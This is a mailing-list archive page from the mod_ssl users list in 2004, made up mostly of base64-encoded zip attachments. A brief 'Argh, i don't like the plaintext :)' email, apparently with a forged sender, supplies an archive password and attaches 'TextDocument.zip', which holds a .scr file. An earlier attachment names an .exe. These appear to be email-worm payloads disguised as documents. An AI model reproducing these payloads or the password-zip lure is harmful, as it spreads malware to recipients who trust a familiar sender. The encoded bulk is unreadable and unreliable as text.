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

----------hlclwsopwsvtqbtmefix--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 15:27:55 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 41F3BA8A7F; Tue,  2 Mar 2004 15:27:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from detector (c-24-15-8-47.client.comcast.net [24.15.8.47])
	by master.modssl.org (Postfix) with SMTP id 787ADA8973
	for ; Tue,  2 Mar 2004 15:27:52 +0100 (CET)
Date: Tue, 02 Mar 2004 08:20:21 -0600
To: modssl-users@modssl.org
Subject: :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gtdwaklqcnwephadrsmb"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gtdwaklqcnwephadrsmb
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh, i  don't like the plaintext :)

..btw, "87023"  is a  password for  archive

----------gtdwaklqcnwephadrsmb
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

UEsDBAoAAQAAAEBBYjBypPFY01UAAMdVAAAMAAAAdHhodmNwc2suc2NyPcvE+mSBYlCA52Iw
G89ws/kqy6Sgm0p1anuIMO6zhohUtqPP/04NT4f4I3IJAF+fO5jgRwcGVJMIHQ3+6kPAUsw3
V6OhiPN9DMySr+LgOqAfyYNQ1Q5Mlie2VhFEtWBHx32MNUS12f1Pyp9AwhoCyWBKCEyezwVo
TCy0KteuhWaHMuYHnKtSq83HUQxDHklml5NTYqLeWnPc7ZZLVvuV0MVp1aELhosdY+9YSFL6
D10NISHbSQDYPdlWA3vObWvxbrWesXtOklJ3m2/UmvVpgAyxUNflElSR7xLlk8TE8qs8ke3K
fXnMwQwzkKiVu1W9DFmz6tZQ9ud+eTuPC10sIa5GPFnMRrbbyYNs7k/U/GuKeihzBYef7p4s
B2zTMk4UL24eVc+ET3qhnwkzrnI3n1VIfSygfNo+kpD0VYh8zP2zDbb5I28hB9qnfswmQegB
B9bUjsqnhW2ujGiSNtEUOaiahySwyv+TCs4qpABQDPUaUVhljzS/rgZN7k2goEzxkUllK+J+
13TmDpA7FIb9du/b04pWKyezfn62IDwyKUgFtHOMSS8e12nqvQ3Prlu/ZN0hb1sg0g5g2QVi
